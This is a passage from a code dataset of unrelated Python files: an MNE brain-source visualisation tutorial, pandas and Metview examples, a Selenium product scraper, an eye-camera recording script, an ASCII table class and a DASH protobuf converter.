tmin=0.05, tmax=0.16,\n# interpolation='linear', framerate=10)\n\n# %%\n# Note that here we used ``initial_time=0.1``, but we can also browse through\n# time using ``time_viewer=True``.\n#\n# In case ``PyVista`` is not available, we also offer a ``matplotlib``\n# backend. Here we use verbose='error' to ignore a warning that not all\n# vertices were used in plotting.\nmpl_fig = stc.plot(\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n backend=\"matplotlib\",\n verbose=\"error\",\n smoothing_steps=7,\n)\n\n# %%\n#\n# Volume Source Estimates\n# -----------------------\n# We can also visualize volume source estimates (used for deep structures).\n#\n# Let us load the sensor-level evoked data. We select the MEG channels\n# to keep things simple.\nevoked = read_evokeds(fname_evoked, condition=0, baseline=(None, 0))\nevoked.pick(picks=\"meg\").crop(0.05, 0.15)\n# this risks aliasing, but these data are very smooth\nevoked.decimate(10, verbose=\"error\")\n\n# %%\n# Then, we can load the precomputed inverse operator from a file.\nfname_inv = meg_path / \"sample_audvis-meg-vol-7-meg-inv.fif\"\ninv = read_inverse_operator(fname_inv)\nsrc = inv[\"src\"]\nmri_head_t = inv[\"mri_head_t\"]\n\n# %%\n# The source estimate is computed using the inverse operator and the\n# sensor-space data.\nsnr = 3.0\nlambda2 = 1.0 / snr**2\nmethod = \"dSPM\" # use dSPM method (could also be MNE or sLORETA)\nstc = apply_inverse(evoked, inv, lambda2, method)\ndel inv\n\n# %%\n# This time, we have a different container\n# (:class:`VolSourceEstimate <mne.VolSourceEstimate>`) for the source time\n# course.\nprint(stc)\n\n# %%\n# This too comes with a convenient plot method.\nstc.plot(src, subject=\"sample\", subjects_dir=subjects_dir)\n\n# %%\n# For this visualization, ``nilearn`` must be installed.\n# This visualization is interactive. Click on any of the anatomical slices\n# to explore the time series. 
Clicking on any time point will bring up the\n# corresponding anatomical map.\n#\n# We could visualize the source estimate on a glass brain. Unlike the previous\n# visualization, a glass brain does not show us one slice but what we would\n# see if the brain was transparent like glass, and\n# :term:`maximum intensity projection` is used:\nstc.plot(src, subject=\"sample\", subjects_dir=subjects_dir, mode=\"glass_brain\")\n\n# %%\n# You can also extract label time courses using volumetric atlases. Here we'll\n# use the built-in ``aparc+aseg.mgz``:\n\nfname_aseg = subjects_dir / \"sample\" / \"mri\" / \"aparc+aseg.mgz\"\nlabel_names = mne.get_volume_labels_from_aseg(fname_aseg)\nlabel_tc = stc.extract_label_time_course(fname_aseg, src=src)\n\nlidx, tidx = np.unravel_index(np.argmax(label_tc), label_tc.shape)\nfig, ax = plt.subplots(1, layout=\"constrained\")\nax.plot(stc.times, label_tc.T, \"k\", lw=1.0, alpha=0.5)\nxy = np.array([stc.times[tidx], label_tc[lidx, tidx]])\nxytext = xy + [0.01, 1]\nax.annotate(label_names[lidx], xy, xytext, arrowprops=dict(arrowstyle=\"->\"), color=\"r\")\nax.set(xlim=stc.times[[0, -1]], xlabel=\"Time (s)\", ylabel=\"Activation\")\nfor key in (\"right\", \"top\"):\n ax.spines[key].set_visible(False)\n\n# %%\n# We can plot several labels with the most activation in their time course\n# for a more fine-grained view of the anatomical loci of activation.\nlabels = [\n label_names[idx]\n for idx in np.argsort(label_tc.max(axis=1))[:7]\n if \"unknown\" not in label_names[idx].lower()\n] # remove catch-all\nbrain = mne.viz.Brain(\n \"sample\",\n hemi=\"both\",\n surf=\"pial\",\n alpha=0.5,\n cortex=\"low_contrast\",\n subjects_dir=subjects_dir,\n)\nbrain.add_volume_labels(aseg=\"aparc+aseg\", labels=labels)\nbrain.show_view(azimuth=250, elevation=40, distance=400)\n\n# %%\n# And we can project these label time courses back to their original\n# locations and see how the plot has been smoothed:\n\nstc_back = mne.labels_to_stc(fname_aseg, label_tc, src=src)\nstc_back.plot(src, subjects_dir=subjects_dir, mode=\"glass_brain\")\n\n# %%\n# Vector Source Estimates\n# -----------------------\n# If we choose to use ``pick_ori='vector'`` in\n# :func:`apply_inverse <mne.minimum_norm.apply_inverse>`\nfname_inv = data_path / \"MEG\" / \"sample\" / \"sample_audvis-meg-oct-6-meg-inv.fif\"\ninv = read_inverse_operator(fname_inv)\nstc = apply_inverse(evoked, inv, lambda2, \"dSPM\", pick_ori=\"vector\")\nbrain = stc.plot(\n subject=\"sample\",\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n brain_kwargs=dict(silhouette=True),\n smoothing_steps=7,\n)\n\n# %%\n# Dipole fits\n# -----------\n# For computing a dipole fit, we need to load the noise covariance, the BEM\n# solution, and the coregistration transformation files. 
Note that for the\n# other methods, these were already used to generate the inverse operator.\nfname_cov = meg_path / \"sample_audvis-cov.fif\"\nfname_bem = subjects_dir / \"sample\" / \"bem\" / \"sample-5120-bem-sol.fif\"\nfname_trans = meg_path / \"sample_audvis_raw-trans.fif\"\n\n##############################################################################\n# Dipoles are fit independently for each time point, so let us crop our time\n# series to visualize the dipole fit for the time point of interest.\nevoked.crop(0.1, 0.1)\ndip = mne.fit_dipole(evoked, fname_cov, fname_bem, fname_trans)[0]\n\n##############################################################################\n# Finally, we can visualize the dipole.\n\ndip.plot_locations(fname_trans, \"sample\", subjects_dir)\n","repo_name":"mne-tools/mne-python","sub_path":"tutorials/inverse/60_visualize_stc.py","file_name":"60_visualize_stc.py","file_ext":"py","file_size_in_byte":7302,"program_lang":"python","lang":"en","doc_type":"code","stars":2405,"dataset":"github-code","pt":"71"} +{"seq_id":"2006747369","text":"import pandas as pd\nimport numpy as np\nfrom pandas import DataFrame, Series\n\nemBranco = np.nan\nnp.random.seed(25)\ndf = DataFrame(np.random.rand(36).reshape(6, 6))\ndf.loc[3:5, 0] = emBranco\ndf.loc[1:4, 5] = emBranco\n\ncount = df.isnull().sum() #somando valores em branco do DataSet\n#Caso passar parametro Axis= 1, o resultado será de um DF sem colunas\ndrop = df.dropna(axis = 1) #apresentando apenas valores que não estão em branco\n\nprint(drop)","repo_name":"viniciusnatal/gotoDataScience","sub_path":"1. Manipulação de dados/04.removeralterarValoresBrancos.py","file_name":"04.removeralterarValoresBrancos.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32919051748","text":"import metview as mv\n\n# read GRIB forecast data\nfilename = \"joachim_pl.grib\"\nif mv.exist(filename):\n data = mv.read(filename)\nelse:\n data = mv.gallery.load_dataset(filename)\n\ndelta = 0.3\n# The vertical hovmoeller modules take an area as an input.\n# We define the location by shrinking down the area to a point,\n# using a delta adjusted to the grid resolution (0.5x0.5 degrees)\nloc = [47, 0] # lat/lon\narea = [loc[0] + delta, loc[1] - delta, loc[0] - delta, loc[1] + delta] # N/W/S/E\n\n# read temperature fields and convert from K to C\nt = mv.read(data=data, param=\"t\")\nt = t - 273.16\n\n# read u and v fields and computes wind speed\nu = mv.read(data=data, param=\"u\")\nv = mv.read(data=data, param=\"v\")\nsp = mv.sqrt(u ** 2 + v ** 2)\nsp = mv.grib_set_long(sp, [\"paramId\", 10])\n\n# define isoline shading for speed\nsp_cont = mv.mcont(\n legend=\"on\",\n contour=\"off\",\n contour_level_selection_type=\"interval\",\n contour_max_level=90,\n contour_min_level=0,\n contour_interval=10,\n contour_label=\"off\",\n contour_shade=\"on\",\n contour_shade_colour_method=\"palette\",\n contour_shade_method=\"area_fill\",\n contour_shade_palette_name=\"m_purple_9\",\n)\n\n# define contouring for t\nt_cont = mv.mcont(\n contour_line_style=\"dash\",\n contour_line_thickness=3,\n contour_line_colour=\"charcoal\",\n contour_highlight=\"off\",\n contour_level_selection_type=\"interval\",\n contour_interval=10,\n contour_label_height=0.4,\n)\n\n# define time axis\ntime_axis = mv.maxis(\n axis_type=\"date\",\n axis_tick_label_height=0.4,\n axis_date_type=\"hours\",\n axis_days_label_height=0.4,\n axis_hours_label=\"on\",\n 
axis_hours_label_quality=\"high\",\n axis_hours_label_height=0.3,\n)\n\n# define vertical axis\nvert_axis = mv.maxis(\n axis_tick_label_height=0.4, axis_title_text=\"Pressure (hPa)\", axis_title_height=0.5\n)\n\n# define hovmoeller view\nview = mv.mhovmoellerview(\n type=\"vertical_hovm\",\n bottom_level=1000,\n top_level=100,\n area=area,\n time_axis=time_axis,\n vertical_axis=vert_axis,\n subpage_y_position=5,\n)\n\n# define legend\nlegend = mv.mlegend(legend_text_font_size=0.3, legend_text_colour=\"charcoal\")\n\n# define title\ntitle = mv.mtext(text_font_size=0.4, text_colour=\"charcoal\")\n\n# define the output plot file\nmv.setoutput(mv.pdf_output(output_name=\"time_height_xs\"))\n\n# generate plot\nmv.plot(view, sp, sp_cont, t, t_cont, legend, title)\n","repo_name":"ecmwf/metview-docs","sub_path":"docs/gallery/time_height_xs.py","file_name":"time_height_xs.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"} +{"seq_id":"40430562113","text":"import time\nimport pandas as pd\nfrom selenium import webdriver as wd\n\ndef sakura():\n \n keyword = input(\"Type Item : \")\n url = 'https://sakurajapan.co.kr/hey/search?keyword={keyword}&type=buy'.format(keyword = keyword)\n \n driver = wd.Chrome(\n r\"C:\\Users\\Administrator\\Desktop\\Coding\\Python\\Scrap\\여행지 상품 크롤링\\chromedriver.exe\")\n driver.get(url)\n \n time.sleep(2)\n \n for i in range(20):\n name = driver.find_elements_by_css_selector('#title_{i}'.format(i=i))\n print(i, name[0].text)\n print('end')\n \n ","repo_name":"DalkomCandy/Python","sub_path":"04. Crawling/Travel/sakura.py","file_name":"sakura.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14072110222","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport time\nimport h5py\nimport argparse\nimport datetime\nimport platform\nimport os\nimport numpy as np \nimport cv2\n\n#*********constants**********#\n#original frame dimensions\nORIGINAL_HEIGHT = 480\nORIGINAL_WIDTH = 848\nORIGINAL_CHANNLES = 3\n#cropped frame dimensions\nIMAGE_HEIGHT = 256\nIMAGE_WIDTH = 512\nIMAGE_CHANNELS = 90\n#focusing camera\nAUTO_FOCUS_1 = 'uvcdynctrl -d video'\nAUTO_FOCUS_2 = ' --set=\\'Focus, Auto\\' '\nSET_FOCUS_1 = 'uvcdynctrl --device=video'\nSET_FOCUS_2 = ' --set=\\'Focus (absolute)\\' '\nFOCUL_CONTINUITY = 5\nFOCUS_ATTEMPTS = 5\nBLUR_ERROR = 3\nPRESET_OPTIMAL_FOCUS = 31\n#other\nDISCARDED_FRAME_COUNT = 100\nMAX_TASK_ID = 10\nDATAPATH = \"/home/tharindu/Desktop/black/data/eyeknowyou\"\n#****************************#\n\n#*********variables**********#\ntask_id = 0\n#****************************#\n\n#**********methods***********#\ndef checkDevice():\n\tdevice_name = platform.node()\n\tprocessor_architecture = platform.machine()\n\tprint(\"\\nEyeKnowYou data collection session initiated...\")\n\tprint(\"Checking System Iformation...\")\n\tprint(\"Computer Name:\" + str(device_name))\n\tprint(\"Instruction Architechture:\" + str(processor_architecture))\n\tprint(\"*******************************************\")\n\tdevice_compatibility = True #change the logic later *****\n\treturn device_compatibility\n\ndef identifyCorrectCamera():\n\treturn 2\n\ndef disableDefaultAutofocus(camera):\n\tauto_focus = 0\n\tAUTO_FOCUS = AUTO_FOCUS_1 + str(camera) + AUTO_FOCUS_2 + str(auto_focus)\n\tresponse = 
os.popen(AUTO_FOCUS).read()\n\tprint(\"------------------------------------------------------\")\n\tprint(response)\n\tprint(\"if no error message was printed just below dash line, successfully disabled autofocus\\n\")\n\ndef enableDefaultAutofocus(camera):\n\tauto_focus = 1\n\tAUTO_FOCUS = AUTO_FOCUS_1 + str(camera) + AUTO_FOCUS_2 + str(auto_focus)\n\tresponse = os.popen(AUTO_FOCUS).read()\n\tprint(\"------------------------------------------------------\")\n\tprint(response)\n\tprint(\"if no error message was printed just below dash line, successfully enabled autofocus\\n\")\n\ndef set_focus(camera, focus_level):\n\tSET_FOCUS = SET_FOCUS_1 + str(camera) + SET_FOCUS_2 + str(focus_level)\n\tfocus_response = os.popen(SET_FOCUS).read()\n\ndef manualAutofocus(camera, cap, search_range=5):\n\tincrement = 1\n\tcount = 0\n\tmax_sharpness = 0\n\tbest_focus = PRESET_OPTIMAL_FOCUS\n\tcurrent_focus = best_focus - search_range - 1\n\twhile(True):\n\t\tcount = count + 1\n\t\tret, original_frame = cap.read()\n\t\tgray_frame = cv2.cvtColor(np.uint8(original_frame), cv2.COLOR_BGR2GRAY)\n\t\tcv2.imshow(\"Focusing\", gray_frame)\n\t\tj = cv2.waitKey(2)\n\t\tif(j == 27):\n\t\t\tbreak\n\t\tcurrent_focus = current_focus + increment\n\t\tset_focus(camera, current_focus)\n\t\tsharpness = cv2.Laplacian(gray_frame, cv2.CV_64F).var()\n\t\tif(sharpness > max_sharpness):\n\t\t\tmax_sharpness = sharpness\n\t\t\tbest_focus = current_focus\n\t\t\tcontinue\n\t\t# else:\n\t\t# \tcurrent_focus = best_focus + search_range\n\t\t# \tincrement = increment * -1\n\t\tif(count > search_range * 2):\n\t\t\tbreak\n\tset_focus(camera, best_focus)\n\tprint(\"Focus point = \" + str(best_focus))\n\tprint(\"Max sharpness = \" + str(max_sharpness))\n\treturn max_sharpness\n\ndef configureCamera():\n\tcamera = identifyCorrectCamera()\n\tdisableDefaultAutofocus(camera)\n\treturn True, camera\n\ndef detectPupil(cap):\n\tsearch_range = 20\n\tmax_sharpness = manualAutofocus(camera, cap, search_range)\n\tpupil_x = 0\n\tpupil_y = 0\n\treturn pupil_x, pupil_y\n\ndef detectCenter(frame, cap):\n\tdetectPupil(cap)\n\tx_center = 0\n\ty_center = 0\n\treturn (x_center, y_center)\n\ndef cropped(frame, center):\n\tx_center, y_center = center\n\tx1 = x_center - int(IMAGE_HEIGHT / 2)\n\tx2 = x_center + int(IMAGE_HEIGHT / 2)\n\ty1 = y_center - int(IMAGE_WIDTH / 2)\n\ty2 = y_center + int(IMAGE_WIDTH / 2)\n\tif(x1 < 0):\n\t\tx1 = 0\n\t\tx2 = IMAGE_HEIGHT\n\tif(y1 < 0):\n\t\ty1 = 0\n\t\ty2 = IMAGE_WIDTH\n\tif(x2 > ORIGINAL_HEIGHT):\n\t\tx2 = ORIGINAL_HEIGHT\n\t\tx1 = ORIGINAL_HEIGHT - IMAGE_HEIGHT\n\tif(y2 > ORIGINAL_WIDTH):\n\t\ty2 = ORIGINAL_WIDTH\n\t\ty1 = ORIGINAL_WIDTH - IMAGE_WIDTH\n\tcropped_frame = frame[x1:x2, y1:y2].copy()\n\treturn cropped_frame\n\ndef runTask(task_id, user, wireless, camera):\n\tframe_list = []\n\tuser_list = []\n\ttask_list = []\n\ttimestamp_list = []\n\tif(wireless):\n\t\tpass\n\telse:\n\t\tcap = cv2.VideoCapture(camera)\n\t\tfor i in range(1, DISCARDED_FRAME_COUNT):\n\t\t\tret, original_frame = cap.read()\n\t\tgray_frame = cv2.cvtColor(np.uint8(original_frame), cv2.COLOR_BGR2GRAY)\n\t\tprint(\"Original frame size = \" + str(gray_frame.shape))\n\t\tcenter = detectCenter(gray_frame, cap)\n\t\twhile(True):\n\t\t\tret, original_frame = cap.read()\n\t\t\tgray_frame = cv2.cvtColor(np.uint8(original_frame), cv2.COLOR_BGR2GRAY)\n\t\t\tcv2.imshow(\"Original Frame\", gray_frame)\n\t\t\tframe = cropped(gray_frame, center)\n\t\t\tcv2.imshow(\"Current Frame\", frame)\n\t\t\tj = cv2.waitKey(2)\n\t\t\tif(j == 
27):\n\t\t\t\tbreak\n\t\t\tdatetime_object = datetime.datetime.now()\n\t\t\tframe_list.append(frame)\n\t\t\tuser_list.append(user)\n\t\t\ttask_list.append(task_id)\n\t\t\ttimestamp_list.append(datetime_object.timestamp())\n\tcap.release()\n\tcv2.destroyAllWindows()\n\tstopTask()\n\treturn frame_list, user_list, task_list, timestamp_list\t\n\ndef createDatafile(datapath):\n\tframe_shape = (IMAGE_HEIGHT, IMAGE_WIDTH)\n\tuser_shape = (1,2)\n\ttask_shape = (1,1)\n\ttime_shape = (1,1)\n\tdt = h5py.string_dtype(encoding='ascii')\n\twith h5py.File(datapath, mode='a') as h5f:\n\t\tframe_dset = h5f.create_dataset('FRAMES', (0,) + frame_shape, maxshape=(None,) + frame_shape, dtype='uint8', chunks=(128,) + frame_shape)\n\t\tuser_dset = h5f.create_dataset('USERS', (0,) + user_shape, maxshape=(None,) + user_shape, dtype='int32', chunks=(128,) + user_shape)\n\t\ttask_dset = h5f.create_dataset('TASKS', (0,) + task_shape, maxshape=(None,) + task_shape, dtype='int32', chunks=(128,) + task_shape)\n\t\ttime_dset = h5f.create_dataset('TIMES', (0,) + time_shape, maxshape=(None,) + time_shape, dtype='int32', chunks=(128,) + time_shape)\n\ndef saveData(datapath, frame_list, user_list, task_list, timestamp_list):\n\twith h5py.File(datapath, mode='a') as h5f:\n\t\tframe_dset = h5f['FRAMES']\n\t\tuser_dset = h5f['USERS']\n\t\ttask_dset = h5f['TASKS']\n\t\ttime_dset = h5f['TIMES']\n\t\tfor i in range(frame_list.shape[0]):\n\t\t\tframe_dset.resize(frame_dset.shape[0]+1, axis=0)\n\t\t\tframe_dset[-1:] = frame_list[i]\n\t\t\tprint(frame_dset.shape)\n\t\tfor i in range(user_list.shape[0]):\n\t\t\tuser_dset.resize(user_dset.shape[0]+1, axis=0)\n\t\t\tuser_dset[-1:] = user_list[i]\n\t\t\tprint(user_dset.shape)\n\t\tfor i in range(task_list.shape[0]):\n\t\t\ttask_dset.resize(task_dset.shape[0]+1, axis=0)\n\t\t\ttask_dset[-1:] = task_list[i]\n\t\t\tprint(task_dset.shape)\n\t\tfor i in range(timestamp_list.shape[0]):\n\t\t\ttime_dset.resize(time_dset.shape[0]+1, axis=0)\n\t\t\ttime_dset[-1:] = timestamp_list[i]\n\t\t\tprint(time_dset.shape)\n\n\ndef stopTask():\n\tprint(\"Data recording terminated. Saving data file....\")\n\ndef endSession():\n\tprint(\"Session terminated. Thank You!\")\n\ndef printTask(task_id):\n\tif(task_id == 0):\n\t\tprint(\"--Unlabeled Data Recording--\")\n\telif(task_id == 1):\n\t\tprint(\"--YouTube Funny Video - Smartphone--\")\n\telse:\n\t\tprint(\"--Unknown Task--\")\n#****************************#\n\n#************body************#\n#arguements \nparser = argparse.ArgumentParser()\nparser.add_argument('--labels', action=\"store\", type=np.bool, default=True) #optional \nparser.add_argument('--wireless', action=\"store\", type=np.bool, default=False) #required\nargs = parser.parse_args()\nlabels = args.labels\nwireless = args.wireless\n\ndevice_compatible = checkDevice()\ncamera_configured, camera = configureCamera()\n\nwhile True:\n try:\n user = int(input(\"\\nEnter User ID: \"))\n except ValueError:\n print(\"Sorry, User ID should be an integer.\")\n continue\n else:\n \tprint(\"\\nUser ID: \" + str(user) + \" has been registered:\")\n \tif(input(\"Do you wish to continue? 
(y/n): \") in ['y','Y']): \n \t\tbreak\n \telse:\n \t\tcontinue\n\nwhile(True):\n\tif(camera_configured and device_compatible):\n\t\tif(labels):\n\t\t\twhile True:\n\t\t\t try:\n\t\t\t task_id = int(input(\"\\nEnter Task ID: \"))\n\t\t\t except ValueError:\n\t\t\t print(\"Sorry, Task ID should be an integer.\")\n\t\t\t continue\n\t\t\t else:\n\t\t\t \tprint(\"\\nFollowing task has been registered:\")\n\t\t\t \tprintTask(task_id)\n\t\t\t \tif(input(\"Do you wish to continue? (y/n): \") in ['y','Y']): \n\t\t\t \t\tbreak\n\t\t\t \telse:\n\t\t\t \t\tcontinue\n\t\telse:\n\t\t\tprint(\"--Unlabeled Data Recording--\")\n\t\t\ttask_id = 0\n\n\tframe_list, user_list, task_list, timestamp_list = runTask(task_id, user, wireless, camera)\n\tdatetime_object = datetime.datetime.now()\n\tdatapath = DATAPATH + \" user_\" + str(user) + \" \" + \"task_\" + str(task_id) + \" \" + str(datetime_object) + \".h5\"\n\tcreateDatafile(datapath)\n\tsaveData(datapath, np.asarray(frame_list), np.asarray(user_list), np.asarray(task_list), np.asarray(timestamp_list))\n\tif(input(\"\\nDo you wish to record another task? (y/n): \") in ['y','Y']): \n\t\tcontinue\n\telse:\n\t\tendSession()\n\t\tbreak\n#****************************#","repo_name":"tikzoxs/EyeKnowYouSSL","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74617802789","text":"class AsciiTable:\n\n def __init__(self, data=[], header=True, separateLines=False):\n PRECISION = 4\n \n self.data = []\n self.colomnWidth = []\n\n for row in data:\n newRow = []\n \n for i, item in enumerate(row):\n if type(item) is float:\n item = round(item, PRECISION)\n \n value = str(item)\n newRow.append(value)\n\n if i < len(self.colomnWidth):\n self.colomnWidth[i] = max(len(value), self.colomnWidth[i])\n else:\n self.colomnWidth.append(len(value))\n\n self.data.append(newRow)\n\n self.charMap = {\n 'top' : '-',\n 'left' : '|',\n 'corner' : '+'\n }\n self.padding = 1\n\n self.header = header\n self.separateLines = separateLines\n \n self.highlightedRowIndex = None\n self.highlightedColIndex = None\n\n def highlightRow(self, index):\n self.highlightedRowIndex = index\n \n def highlightCol(self, index):\n self.highlightedColIndex = index\n\n def __str__(self):\n\n chars = self.charMap\n HIGHLIGHT_ROW = \"-->\"\n HIGHLIGHT_COL = \"^\\n|\\n|\"\n\n def _getHorizontalLine():\n result = chars['corner']\n\n for width in self.colomnWidth:\n result += chars['top'] * (width + 2 * self.padding) + chars['corner']\n\n return result\n\n def _getRowWithData(data):\n result = chars['left']\n\n for i in range(len(self.colomnWidth)):\n width = self.colomnWidth[i] + self.padding\n formatStr = '{:>' + str(width) + '}' + (' ' * self.padding)\n\n if i < len(data):\n result += formatStr.format(data[i])\n else:\n result += formatStr.format('')\n\n result += chars['left']\n\n return result\n\n def _getLinePrefix(i):\n highlightRowEnabled = not self.highlightedRowIndex is None\n if not highlightRowEnabled:\n return \"\"\n \n PREFIX = \" \" * len(HIGHLIGHT_ROW)\n\n if i == self.highlightedRowIndex:\n return HIGHLIGHT_ROW\n else:\n return PREFIX\n\n def _getColHighlightFooter(highlightedCol, linePrefix = \"\"):\n widths = [2 * self.padding + 1 + w for w in self.colomnWidth]\n widths = widths[:highlightedCol]\n\n markerPos = sum(widths) + 1\n\n markerPos += self.padding + self.colomnWidth[highlightedCol] // 2\n\n footer = \"\"\n marker = 
HIGHLIGHT_COL.split(\"\\n\")\n \n for char in marker:\n footer += linePrefix + \" \" * markerPos + char + \"\\n\"\n\n return footer\n\n highlightColEnabled = not self.highlightedColIndex is None\n\n output = _getLinePrefix(-1) + _getHorizontalLine() + '\\n'\n\n lastI = len(self.data) - 1\n for i, row in enumerate(self.data):\n output += _getLinePrefix(i) + _getRowWithData(row) + '\\n'\n\n if (i == 0 and self.header) or (self.separateLines) or (i == lastI):\n output += _getLinePrefix(-1) + _getHorizontalLine() + '\\n'\n\n if highlightColEnabled:\n output += _getColHighlightFooter(self.highlightedColIndex, _getLinePrefix(-1))\n\n return output\n","repo_name":"File5/stat-work","sub_path":"asciitable.py","file_name":"asciitable.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19288350905","text":"import re\nimport socket\nimport ipaddress\nimport uuid\nimport pytest\n\nfrom dash_api.appliance_pb2 import Appliance\nfrom dash_api.vnet_pb2 import Vnet\nfrom dash_api.eni_pb2 import Eni, State\nfrom dash_api.qos_pb2 import Qos\nfrom dash_api.route_pb2 import Route\nfrom dash_api.route_rule_pb2 import RouteRule\nfrom dash_api.vnet_mapping_pb2 import VnetMapping\nfrom dash_api.route_type_pb2 import RoutingType, ActionType, RouteType, RouteTypeItem\nfrom dash_api.types_pb2 import IpVersion, IpPrefix, ValueOrRange\nfrom dash_api.acl_group_pb2 import AclGroup\nfrom dash_api.acl_out_pb2 import AclOut\nfrom dash_api.acl_in_pb2 import AclIn\nfrom dash_api.acl_rule_pb2 import AclRule, Action\n\n\nENABLE_PROTO = True\n\n\ndef appliance_from_json(json_obj):\n pb = Appliance()\n pb.sip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"sip\"])))\n pb.vm_vni = int(json_obj[\"vm_vni\"])\n return pb\n\n\ndef vnet_from_json(json_obj):\n pb = Vnet()\n pb.vni = int(json_obj[\"vni\"])\n pb.guid.value = bytes.fromhex(uuid.UUID(json_obj[\"guid\"]).hex)\n return pb\n\n\ndef vnet_mapping_from_json(json_obj):\n pb = VnetMapping()\n pb.action_type = RoutingType.ROUTING_TYPE_VNET_ENCAP\n pb.underlay_ip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"underlay_ip\"])))\n pb.mac_address = bytes.fromhex(json_obj[\"mac_address\"].replace(\":\", \"\"))\n pb.use_dst_vni = json_obj[\"use_dst_vni\"] == \"true\"\n return pb\n\n\ndef qos_from_json(json_obj):\n pb = Qos()\n pb.qos_id = json_obj[\"qos_id\"]\n pb.bw = int(json_obj[\"bw\"])\n pb.cps = int(json_obj[\"cps\"])\n pb.flows = int(json_obj[\"flows\"])\n return pb\n\n\ndef eni_from_json(json_obj):\n pb = Eni()\n pb.eni_id = json_obj[\"eni_id\"]\n pb.mac_address = bytes.fromhex(json_obj[\"mac_address\"].replace(\":\", \"\"))\n pb.underlay_ip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"underlay_ip\"])))\n pb.admin_state = State.STATE_ENABLED if json_obj[\"admin_state\"] == \"enabled\" else State.STATE_DISABLED\n pb.vnet = json_obj[\"vnet\"]\n pb.qos = json_obj[\"qos\"]\n return pb\n\n\ndef route_from_json(json_obj):\n pb = Route()\n if json_obj[\"action_type\"] == \"vnet\":\n pb.action_type = RoutingType.ROUTING_TYPE_VNET\n pb.vnet = json_obj[\"vnet\"]\n elif json_obj[\"action_type\"] == \"vnet_direct\":\n pb.action_type = RoutingType.ROUTING_TYPE_VNET_DIRECT\n pb.vnet_direct.vnet = json_obj[\"vnet\"]\n pb.vnet_direct.overlay_ip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"overlay_ip\"])))\n elif json_obj[\"action_type\"] == \"direct\":\n pb.action_type = RoutingType.ROUTING_TYPE_DIRECT\n else:\n pytest.fail(\"Unknown action type %s\" % 
json_obj[\"action_type\"])\n return pb\n\n\ndef route_rule_from_json(json_obj):\n pb = RouteRule()\n pb.action_type = RoutingType.ROUTING_TYPE_VNET_ENCAP\n pb.priority = int(json_obj[\"priority\"])\n pb.pa_validation = json_obj[\"pa_validation\"] == \"true\"\n if json_obj[\"pa_validation\"] == \"true\":\n pb.vnet = json_obj[\"vnet\"]\n return pb\n\n\ndef routing_type_from_json(json_obj):\n pb = RouteType()\n pbi = RouteTypeItem()\n pbi.action_name = json_obj[\"name\"]\n pbi.action_type = ActionType.ACTION_TYPE_MAPROUTING\n pb.items.append(pbi)\n return pb\n\n\ndef acl_group_from_json(json_obj):\n pb = AclGroup()\n pb.guid.value = bytes.fromhex(uuid.UUID(json_obj[\"guid\"]).hex)\n pb.ip_version = IpVersion.IP_VERSION_IPV4\n return pb\n\n\ndef acl_out_from_json(json_obj):\n pb = AclOut()\n pb.v4_acl_group_id = json_obj[\"acl_group_id\"]\n return pb\n\n\ndef acl_in_from_json(json_obj):\n pb = AclIn()\n pb.v4_acl_group_id = json_obj[\"acl_group_id\"]\n return pb\n\n\ndef acl_rule_from_json(json_obj):\n pb = AclRule()\n pb.priority = int(json_obj[\"priority\"])\n pb.action = Action.ACTION_DENY if json_obj[\"action\"] == \"deny\" else Action.ACTION_PERMIT\n pb.terminating = json_obj[\"terminating\"] == \"true\"\n if \"src_addr\" in json_obj:\n for addr in json_obj[\"src_addr\"].split(','):\n net = ipaddress.IPv4Network(addr, False)\n ip = IpPrefix()\n ip.ip.ipv4 = socket.htonl(int(net.network_address))\n ip.mask.ipv4 = socket.htonl(int(net.netmask))\n pb.src_addr.append(ip)\n if \"dst_addr\" in json_obj:\n for addr in json_obj[\"dst_addr\"].split(','):\n net = ipaddress.IPv4Network(addr, False)\n ip = IpPrefix()\n ip.ip.ipv4 = socket.htonl(int(net.network_address))\n ip.mask.ipv4 = socket.htonl(int(net.netmask))\n pb.dst_addr.append(ip)\n if \"src_port\" in json_obj:\n for port in json_obj[\"src_port\"].split(','):\n vr = ValueOrRange()\n if \"-\" not in port:\n vr.value = int(port)\n else:\n vr.range.min = int(port.split('-')[0])\n vr.range.max = int(port.split('-')[1])\n pb.src_port.append(vr)\n if \"dst_port\" in json_obj:\n for port in json_obj[\"dst_port\"].split(','):\n vr = ValueOrRange()\n if \"-\" not in port:\n vr.value = int(port)\n else:\n vr.range.min = int(port.split('-')[0])\n vr.range.max = int(port.split('-')[1])\n pb.dst_port.append(vr)\n if \"protocol\" in json_obj:\n for proto in json_obj[\"protocol\"].split(','):\n pb.protocol.append(int(proto))\n return pb\n\n\nhandlers_map = {\n \"APPLIANCE\": appliance_from_json,\n \"VNET\": vnet_from_json,\n \"VNET_MAPPING\": vnet_mapping_from_json,\n \"QOS\": qos_from_json,\n \"ENI\": eni_from_json,\n \"ROUTE\": route_from_json,\n \"ROUTE_RULE\": route_rule_from_json,\n \"ROUTING_TYPE\": routing_type_from_json,\n \"ACL_GROUP\": acl_group_from_json,\n \"ACL_OUT\": acl_out_from_json,\n \"ACL_IN\": acl_in_from_json,\n \"ACL_RULE\": acl_rule_from_json,\n}\n\n\ndef json_to_proto(key, json_obj):\n table_name = re.search(r\"DASH_(\\w+)_TABLE\", key).group(1)\n if table_name in handlers_map:\n pb = handlers_map[table_name](json_obj)\n else:\n pytest.fail(\"Unknown table %s\" % table_name)\n return 